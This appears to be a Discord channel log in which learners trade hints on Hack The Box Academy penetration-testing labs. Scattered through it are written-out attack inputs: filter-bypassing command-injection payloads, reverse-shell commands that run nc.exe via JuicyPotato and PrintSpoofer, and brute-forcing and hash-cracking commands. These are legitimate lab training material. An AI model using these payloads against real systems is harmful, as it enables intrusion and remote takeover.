•     Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
  

•                 ~~~~~~~~~
  

Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : InvalidVariableReferenceWithDrive

Thanks for the help @west canopy , I realized what I was doing wrong and finally got the flag :D, but Im curious, how did you come with the conclusion that the username format was "support.xx"? I found nothing that led me to this information about this username format, with a point between support and the country code

@manic ermine Yes I had to change a line of the script to make it work, specifically line 261

@random cape they give a vague clue on one of the pages at the top, after you first sign up and log in to the website. I forget which page though.

https://academy.hackthebox.com/achievement/519906/9

HI, who did file upload attack module?

Hi!, I am with Password Attack Lab - Easy (Examine the first target and submit the root password as the answer.) and i am doing bruteforce with hydra against SSH using username.list and password.list from the resources, this is correct or it is with another wordlists?

i tried with both lists for usernames and passwords, and using root as user and some others password wordlists like rockyou, rockyou-30 and the same password.list from resoruces, i splited many times the username.list and have iterate at least 2 times all splited lists :c

I do not know if root is the user with whom I have to log in and I only have to find the password, or if I must find the user to later extract the root hash, I think it is more the second option

I'm in Vulnerability Assessment and should use nessus. It asks me to go to the IP given in the credentials. But when I go it says unable to connect. And I am using vpn correctly.

dm if still need help

Have use used also the correct port for Nessus Web Interface?

Yes, isn't it 8834?

Hey hey anyone else having issue connecting through ssh on login brute force ?

can somebody help me with the DNS section of the "Attacking common services" module? i guess i don't understand properly how subbrute works.

anyone can help me in Login Brute Forcing - Service Login? DM me

@tranquil carbon done all may I dm you ?

hello guys

Kk 👌

@knotty hemlock You can DM me if you wish.

Can I get some help with the hashcat module in particular the hybrid lesson?

For anyone working on kali linux (or anything that is not the pwnbox). How do you connect back to your own machine? E.g. when setting up a web server and trying to let an XSS injection fetch something? Which IP address do you use?

I have a question regarding the Extra exercise from the Module: "SECURE CODING 101: JAVASCRIPT "

Extra Exercise: Are you feeling bold?
If you wanted to take it a step further (and prepare for the Whitebox Pentesting 101 module at the same time), it is possible to inject a command that passes the if statement, such that the sendCode function would execute and send the secret message to your HTTP server on our box. To do that, you would have to inject a command that would make the if statement return true, such that it would go into its inner function.

I am no expert in JS, so the (for me) most intelligent way was to try to overwrite the md5 function within the eval function, which worked, but only on a consecutive call of the md5 function. The other solution for me would have been finding a value for which the md5 function outputs the value from the actual statement. But there is no known cleartext for that. So my question is: Is there a general way that an eval in an if statement can be used to cause this if statement to return true or is there a way I can use eval to do such a thing as function overwriting to cause such a behavior to control one part of the statement?

The code for this is more or less something like this:

if (md5(eval('cookie="' + document[cookie] + '"')) == '2b...SNIP...f8') {
    do_this();
}

You still need help? If yes DM me

Thank you

hey guys, does somebody know how much datavolume the pwnbox needs? Im Sitting in the Train and think about to do some exercises but just have mobile hotspot😆

yeah i know, but I have no idea how data intensive the connection is

Sure

np!

Hellooo

I’m new here so idk what to do

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks mate, managed just now 🙂

Anyone have any help sheets?

Can someone give me a hint on "Server-Side Attacks - Skills Assessment"? I tried all the sections on the form that reflected my input and nothing

@rustic sage try viewing the page source and look at the javascript function

there is only jQuery been imported, can't find any custom js

ahah, security over obscurity case, they got me, thanks for the tip 😄

Right on, thanks man!

Can someone help me with "command injection" module. Bypassing Other Blacklisted Characters.

anyone who has finished the Using Web Proxies module, to ask some related with one of the exercises..!!!

In the Broken Authentication, part 2. How am I supposed to use this script provided? Where do I run it ?

I'd need a big nudge forward here to get this started, I have no clue what are they trying to explain in the examples

I managed to run the script, but keep getting this:

Any nudge forward, what am I doing wrong here:

@tiny ledge don't even bother with the bruteforce script. Try just using burpsuite or Curl to add the x-forwarded-for header , and any username and password should return the flag 🙂

This worked instantly thank you! Frustrating though that they teach you completely different thing on the module and even request using it

@tepid jolt try using a combination of ${IFS} and ${PATH:0:1} to run the command: ls /home

who has completed Using Web Proexies?

I need some help

hints

i got a question

how do i hack myself?

meditation

Sure, go ahead and DM. Where are you stuck?

cool, give me a sec to take some notes

let me try some things and if I don't got the flag I send to you a DM, ok?

Np!

hi

Hi anyone could give a hint on the AD Enumeration & Attacks - Skill Assessment Part 1
Submit the contents of the flag.txt file on the Administrator desktop on MS01 ?
i m trying using runas and wmic but the webshell crash

ACTIVE DIRECTORY ENUMERATION & ATTACKS - ACL Abuse Tactics. There is no need to hide wley's pass since it's cleartext under Credentialed Enumeration - from Linux

Another thing is that the instance is a static IP. I believe it's sharing among us. Don't be surprise to see error/warning when it's telling you that the user already been added to the group.

I also think the clean up session is part of solutions for that.

Another thing. HTB allows user to crack password under machines once while. I'm failing to do so recently. have to go for my own kali

Could anyone let me know if you success run hashcat/john on HTB machines, please? Thank you

@woven copper I was able to get it by setting up port forwarding and then RDPing with proxychains. DM me and i can walk you through it 🙂

@west canopy that something you learn on the Pivoting Tunneling module ?

yep !

okey i think i prefer take the module and then go back on the AD , thanks for answer me

you're welcome 🙂

@tired bridge DM me if still need help with file upload attacks 🙂

Do I need to pay to do the HTB academy?

With a free account you should be able to unlock the Fundamental modules but for additional modules yes, it will cost money for a subscription or additional Cubes

Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information

Can I DM you ?

Hey thanks a lot I realized that I was forgetting to use ${IFS}

@polar widget Sure 🙂

im trying to fine tab and im looking dead at it😂

sure dm

Hey I still cant connect to through ssh on Service Authentication Brute Forcing
module. Cant ping it, ssh : connection time out, I tried with and without openvpn (plus change openvpn key)

Im a bit lost ngl

And I test my ssh service and its working well on other target

Can you share the ss?

ss?

ah yea

ScreenShot.

The port's correct?

yep

reset target?

done like 10 time ^^

doing it for 2 day now

are you sure you are asked to connect like that?

yes its writen use that for connect

The username seems a bit off too

i did not do this module sorry.

SSH to 159.65.58.189 with user "b.gates" and password ""

this is the sentence

ssh b.gates@$IP should work too

append $before IP ?

no

a without porot

port

ssh b.gates@159.65.58.189

done it too

Can you share me the screenshot of the question and the ip provided in the task?

then it will promt for a password

sure

normaly

then

You found the password?

ssh b.gates@159.65.58.189

then enter to not specifi password

bruh

yup

look at the port buddy

are you sure its 22 ? 😄

If yes
Use the following command
ssh b.gates@159.65.58.189 -p 31006

there is a space in the ip but yes use that

Ah that's my keyboard fking cause I am on phone

taht what they prvide

port 22 is default

that why im confuse af

your target is configured to run over 31006

replace 22 by 31006

oooh

working

ahah

Nice

when you see this

10.0.0.0:PORT

after the : is the port

yea yea

but I didnt know

it was a ssh prot

port

it can be any port 😄

Their not some reserved one ?

you can configure it to go on 1337 if you want

22 is the default one

sure

Thank guys appreciate

If the task have given you a port
You are expected to use that port
If not provided. It can be either default or you have to search by scanning

Indeed

well hf now

Yup thank again 👽

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
Need help on that question I cannot find the second flag.

find / -name flag.txt
nvm I found it.

hi guys i need some help

it can save my sis's life you can helpme

@uneven forum

@sick fulcrum

Please don't ping for no reason

If a life is at stake contact your emergency services

i mean nvm

do you know hacking?

No-one here does, we're just a rôle playing server

We're huge fans of Mr robot

oo

?

If you have a question about hacking I suggest using #613049811481919508 and asking there

#modules is for help on academy modules

ok

And please keep it legal or we'll have to take sanctions

sanctions?

Ban you

oo

but can the illigeal stuff done in dms?

just asking

don't take seriously

I suggest reading discord ToS

Also if it's illegal why would you think it's ok

oo

ok

sorry

Hoping anyone here can help me with out-of-bound connections. Background: I'm working my way trough the modules on my Kali Linux VM running on my Macbook. The VM is connected to the openvpn academy file. I am stuck on ALL the questions that require you to make an out-of-bound connection (AKA connecting from the target machine to my VM for e.g. a remote shell or XXE injection). Whatever IP address I use, I'm not able to connect from the target machine to my web server running on my VM). Really hoping someone could help me out with this.

Are there any extra steps involved in order to allow a remote connection back in to your VM?

Pinging anyone that is not working on the parrot/pwnbox but on a VM

Is firewall on the vm? It should be, but have open ports you need to get connection

Firewall is off as far as I can tell

Hi all!
I have a problem. I didn't understand the meaning of this question :/

The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?

Which module/section?

Module: Using the Metasploit Framework
Section: Sessions

Here is screenshot

You have to find the name of the web application used. So can can find a exploit for this web app. Check the html source as it says. You will find a name which app it is…. Have you checked the source code of the page-view source-?

Thanks, I'll try now

Thanks a lot, it works

Login Brute Forcing Skills Assessment, someone pleaseeee?

I think I'm doing the correct steps, but can't login into ssh.

Solved this

Hi everyone

1st time in discord

I'm working on USING THE METASPLOIT FRAMEWORK module and I'm stack in session where i try to exploit the machine's web app elFinder

I try all option i found in msf "search elFinder" but the machine is not vulnerable

Can anyone give me a hint?

Hey, I'm on the same page. try firefox settings web dev -> page source -> is the word next to Studio-42

Thanks a lot

which section of the module is this?

sudo nmap --script=all $TARGET_IP --min-rate 3500

Module: Metasploit Framework

Section: Sessions & Jobs

Anyone using Brave Browser, Is there fix for the 'Hint' and 'Cheat Sheet' not working:

refresh is a temp fixed

Did you set all the necessary options for the exploit?

RHOSTS and LHOST where needed only

I just run it and it worked. (as you said, only RHOSTS and LHOST set)

Maybe try another exploit?

I tried those s far

it worked with one of these options?

dm you

Can anyone help me with Cracking Common hashes? I'm struggling with a solution.

Did you solve this??? @plush garden

I tried No3, but I didn't find answer :/

need help on skill assesment sqlmap essentials i'm kinda stuck

Anyone solved: Broken Authentication - Predictable Reset Token, all I get is this:

Check timezones and try increasing the range. That worked for me.

Also, I remember that the MD5 hash generated on the server was in microseconds, so you might want to perform a multiplication somewhere

any1 ?

DM

Which module to be specific?

Cracking Passwords with Hashcat

what is the question?

Crack the following hash: 7106812752615cdfe427e01b98cd4083

echo "7106812752615cdfe427e01b98cd4083" > hash.txt

hashcat hash.txt /usr/share/wordlist/rockyou.txt

you can use hashid to see what hashing type is

or hash-identifier

I have tried the md5 and NTLM modes, from Hash identifier, no success.

The hint said use a rule and I tried the hybrid mode from previous examples.

Alright once I hop on the desktop I'll let you know
Till then try or have something refreshing

Awesome! Thanks, still drinking coffee to wake up LOL

You know
I first solve questions and then read the theory,
From fundamental - medium modules I've been doing that lmfao.

Or at times we gotta read the necessary theory and practice them right away, this approach I admire it too

HTB academy is doing a great job

So when I cracked some hashes in there, I straight away jumped into their skills assessment,
Last question was challenging and fun, spent some time scripting stuffs

And solved em all

Interesting. Some academics say to read the questions, then read the material so that you can see the answers to look for.

Having familiarity with subject

Well, we're gonna have the cracking with hashcat achievement under our belt tonight

Anyone knows why ffuf can't find the directories?

While with gobuster, I can find them

That's why we validate using different tools
This learning is very crucial while dealing with forensics artefacts too,

Some tools just don't work as expected, and you'll never know
Because you're expecting a output in the end of day

Yeah, but I'm in the "Attacking Web Applications with Ffuf" module...that's why I asked

Lmfao 😂😂

I can't really say about that
Will jump into it later

That's weird...if someone knows why this happens, please tell me

Maybe change user agent to gobuster 😂

Which section is this from?

this is the hash that he posted

No I'm asking the exact section its from

Need to know the background of hash

I dont know i dont have the module unlocked

Found it

Cracked it

is parrot linux work on a 3gb ram machine ?

i currently using linux mint but i want switch to parrot security

Hey guys, can anybody help with the "Bypassing Other Blacklisted Characters" question in the "Command Injections" module?

I have been trying ||127.0.0.1${LS_COLORS:10:1}${IFS}${PATH:5:1}${PATH:2:1}${IFS}${PWD:0:5}${LS_COLORS:10:1} which should be "127.0.0.1; ls /home;"|| but it's not working... could someone please point out what I'm doing wrong? thanks! 🙂

Check if your wordlist contains file extensions or not

It doesn't

I would say you suck, but I'm afraid that you might take offense!

How?

lmao yeah slide in DM

You must have an error in your syntax then. Feel free to DM me and we can figure it out

What is the FQDN of the IP address 10.10.34.136? Anyone know what to do here? I have been trying to zone transfer, but it doesn't seem to work

DM me

did you find the answer?

no need to use $

Any one able to help with " Submit the contents of the flag.txt file on the Administrator desktop on MS01" on AD Enumeration & Attacks - Skills Assessment Part I? I can't get a shell on this box

The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.

Does anyone know how to solve this problem?
Module: Metasploit Framework. Section: Sessions & jobs

What have you tried so far

1. I got access into shell
2. perl 'print(("A" * 100 . "\x{00}") * 35)' | sudo su id (fail)
3. CVE-2021-3156 (fail)

DM me
I don't wanna get comprehensive with the steps publicly

Dm if still need help

Just want to put this out there for anyone just getting started. Do yourself a favor before attempting the "Information Gathering - Web Edition" module, go do the "Footprinting" module first. It will help you tremendously with Active Subdomain section.

trying to tackle this last question on web requests and i cant seem to wrap my head around it, any help would be appreciated!

If I remember I had to delete more than one city to get it to work but feel free to DM me

Has anyone had trouble installing tplmap? The instructions in server side attacks work for me, up until pip install -r requirements

hello everyone, im trying for hours now, the academy module LFI. im on the last question, i can read the content of index.php via using base64 filter in the get param. but other than than im not sure what to do now because index.php appends .php at the end of the file :/ so i cant read other files.

Hi. Can someone give me a hint with Module ATTACKING COMMON SERVICES Section Attacking FTP. I am trying to bruteforce the user on FTP. I know Cry0l1t3 likes making modules hard (had it very difficult on Password Attacks and not very enjoyable) but I find sometimes we have to take different paths from the section to find out things. Also the FTP 2xxx appears and dissappears.

Hi guys, I'm trying to exploit with a PAYLOAD to get sudo old vesrion access but I'm stack here

i guess you need to set both the rhost and the lhost before exploitting so as to get a reverse shell

thanks, I tried, same result

mind sharing the screenshot after running show options?

aahihihih

\

php://filter/write
is it possible to use write filter to overwrite a file with LFI ?

what is that??

i'm doing the skills assessment for javascript obfuscation and would like a little help please

I've got deobfuscated code and it's telling me to find a secret key but don't see anything like that in the code

I'm trying to open a session and get root access for old sudo version

okoko

using the metasploit framework?

yes, but the session isn't established @polar widget

you can see it by manually concatting the strings in the varible called flag

the same for the log at the bottom

how i can start hacking

??

have you successfully exploited elFinder ? what did you do with that session

I got the machines shell @polar widget and I need to get root privileges

i already used that

then load the module from msfconsole which deals with the vulnerable sudo version

@supple oasis

lol nope

it has something to do with /keys.php

but that doesn't work

its fail

dont use that

maybe lock your pc

I found this one exploit(linux/local/sudo_baron_samedit) but I'm stuck to open a session with PAYLOAD

show me what's in the options set for that specific module

what're you talking about lol

i got it

send a post request to the url with /keys.php and you get an encoded string

time to decode

why are you stay alive xd

@high zinc

that's why

lmfao

apologies. xD

deleted it all i think

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

???

dead server

solved 🙂 thank you

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

i can read the php files content but only php files because it appends them at the end of the parameter.
im not sure how im gonna get remote code execution

im stuck in the very last task for hours now
https://academy.hackthebox.com/module/23/section/513

why you tell me what to do

??

this server is dead

great!

Does hydra handle well CRLF line terminators?

Hey everyone, any hints for Firewall and IDS/IPS Evasion - Medium Lab

dm me

dm me

hey guys, im doing #Attacking SQL Databases section on first question. I have the hash to crack now, but I don't know how to understand what kind of hash is, to crack after with hashcat. How can I undestand that? I tried to query google with hash, or hash-identifier, but nothing...

use hashid

you can also use dcode but I think hashid is explained in that module

not encountered yet, to undestand better, may I ask by md you?

DM me

DM me

Can anyone help me out with the SQL injection skills assessment. I have done a lot of enumeration/injections and found credentials Im just having trouble with getting a shell

my pleasure.

dm me

@drifting knoll has the NMAP module been changed? The method I used to solve the medium lab no longer works the way I originally solved it. I am just curious? I was able to solve it another way but it bugs me that what I used before fails now.

Module: INFORMATION GATHERING - WEB EDITION
Section: Active Infrastructure Identification
hi folks, i have the most stupid question probably:* Which CMS is used on app.inlanefreight.local? *
How do I scan the vhost specifically? scanning the target machine doesn't throw CMS information

Hey guys! Could anyone help me with the question from the module "Network Enumeration with Nmap / Service Enumeration" - "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I've tried so many options and no luck so far. What am I missing? Appreciate your help. Just need to understand the logic behind this question.

Hey, can I DM you regarding this one? I run the Responder then execute the commands in MSSql but can't get the hash.

or you? 🙃

Solved it with using nc at 31337 and tcdump. Though I barely understand the concept of tcpdump yet. The academy should be more verbose on such things coz we beginners don't get it that easy.

yes but did you try both command ||XP_SUBDIRS|| and ||XP_DIRTREE ||

Yes..I also tried Responder and impacket-smbserver

@uncut raptor try adding app.inlanefreight.local to your /etc/hosts file, and then use whatweb 🙂

even with the hacking machine from htb that's needed?

yep

can't seem to get edit access on the hosts file

there should be a file on the desktop called my_credentials.txt i think

so you can use that password to switch to root user , then edit the file 🙂

it does not want to give up the CMS lol, i did echo "TARGET_IP app.inlanefreight.local" on hosts and the new line is there, but whatweb prints the same as always, OS , plugins, etc, but not cms

Hey everyone. I need help with the module on Windows Fundamentals. Im on the last question in the final section called Skills Assessment. The question is “List the SID associated with the HR security group you created.” I’ve been at this for two hours and I can’t answer it. If someone who has completed this module, help me that would be great. You can DM me so this channel won’t have any spoilers. Thanks ☺️

@umbral yacht I got you dawg 🙂

Thank you! 😩

Hey someone for Windows Privilege Escalation I have a question ?

What is wrong with my command? This tool sucks ass (wordpress skill assesment)

windows privilege escalation skill assessment part 1 anyone do this module? seems obvious escalation paths of Juicypotatoe and printspoofer dont work? getting this error when running juicy {potatoe c:\Windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\Windows\Temp\nc.exe 10.10.14.135 5555 -e cmd.exe" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
COM -> recv failed with error: 10038}

working on this module now too whats your question?

Are you sure you find the right website? Check for other links on the page 😉

print spoofer also doesnt seem to work getting error c:\Windows\Temp\PrintSpoofer32.exe -c "c:\Windows\Temp\nc.exe 10.10.14.135 5555 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out. Any one else that did this module run into osimilar issue and if so any tips or clues what to do next?

Are you sure about this? Everywhere I click does not lead me to another site.

Maybe I'm just dumb,

How about a blog or something? (hope I'm not mixed between module let me go check)

This is what I see

Look for the blog link. Where does it's trying to get you to? You just need to update your /etc/hosts to be able to access that vhost, Use the same IP.

Oh,. think I don't have the right module. Are you talking about hacking wordpress skills assessment?

yes. And I already edited /etc/hosts

If you hadnt had help yet think on youtube I remember seeing a full video guide on there of the sql injection fundementals module.

@sweet heron Found what you are talking about. Thank you. Sorry for confusion

Great! 🙂

https://www.youtube.com/watch?v=jOooDvATnsY , https://www.youtube.com/watch?v=AbjWXJIjpX4 , https://www.youtube.com/watch?v=1-N3wmXV1ZQ

can anyone help me out with Skills Assessment - File Upload Attacks? Please dm me. I have it mostly figured out already, just stuck on one step!

Looking for help on the File Upload Attacks Assessment as well. I was able to bypass the file upload but unsure how to locate the file nor read any php file, tried using some methods to try reading the config files but still no success.

Hey team, can anybody give me a nudge for Command Injection - Skills assessment?
I'm struggling to get my payload working.

Here is what I have so far:
||http://157.245.46.136:30166/index.php?to=tmp&from=51459716.txt${LS_COLORS:10:1}${IFS}c'a't${IFS}${PATH:0:1}flag.txt${LS_COLORS:10:1}&finish=1&move=1||

I getting the following error:
||Error while moving: mv: cannot stat '/var/www/html/files/51459716.txt': No such file or directory
mv: cannot stat 'cat': No such file or directory
mv: cannot move '/flag.txt' to '/var/www/html/files/tmp/flag.txt': Permission denied||

Any hints? 🙂

@stable sparrow try putting your payload after to=tmp

Because for example, if we were using the mv command in linux it would look like: mv /original/file /destination/file . So if we were to chain a command after this, it would come AFTER the destination. If that makes sense

@steep loom @fiery trench DM me 🙂

to anyone that gets stuck on "attacking FTP" section: hint 1 restart target multiple times until port 2121 comes out in nmap hint 2 ftp syntax "ftp IP PORT" hint 3 set no real email as hello@example.com

Password Attacks Module/Password Mutations Section:

I created a wordlist with best64.rule, brute force ssh, hydra running 1 hour and still no result...

Any ideas/hints?

1hr damn :/

Yes...do I have to create the list with another rule maybe? But is very difficult to guess how/which rule to use...

That's why I chose the best64.rule
It also says "One of the most used rules is best64.rule", that's why I chose it

I'm seeing plenty of help requests for this module 👀
I'll collect courage to attempt it this weekend

I'll let you know my strategy then

Friends, tell me what is required of me, I don’t understand the question?😛 (I translate the question into my own language)

Nessus Skills Assessment.
What were the targets for the authenticated scan?

I also tried this with the custom made list as shown in the example. no results.

Anyone help please?

dm

Dm @stable sparrow if you still need help

need help on sqlmap essentials skill assesment

Hello! Why target IP doesn't work? Link for Module and Section: https://academy.hackthebox.com/module/39/section/414

AD enumeration and attacks, skills assessment part II: Second question, what is the user's cleartext password. I've got the NTLMv2 hash, but can't crack it... Any nudge?

@languid dawn

Where are you stuck, what have you tried? You can DM.

Any nudge forward on: BROKEN AUTHENTICATION - Second Question: Request a reset token for htbuser and find the encoding algorithm, then request a reset token for htbadmin to force a password change and forge a valid temp password to login. What is the flag? | After decrypting the temp pass from Base64, what am I supposed to get from this random set of numbers, I'm drawing complete blank

@rustic sage you can hit the big red button for that kinda stuff :D

Aka srs rule break

hein

he was promoting a +18 server

Yeah, there's a role we all have in big red letters, use that so you're sure a mod looks into it

Big red button

serious rule break?

It's fine though I was here

Ye

okok

yeah i tagged you because you were talking in #general

but nice to know

DM me

Hello, can someone help me with the live assessment of module SHELLS & PAYLOADS? if so plz me, been stuck one this for a while now

dm if you are still stuck.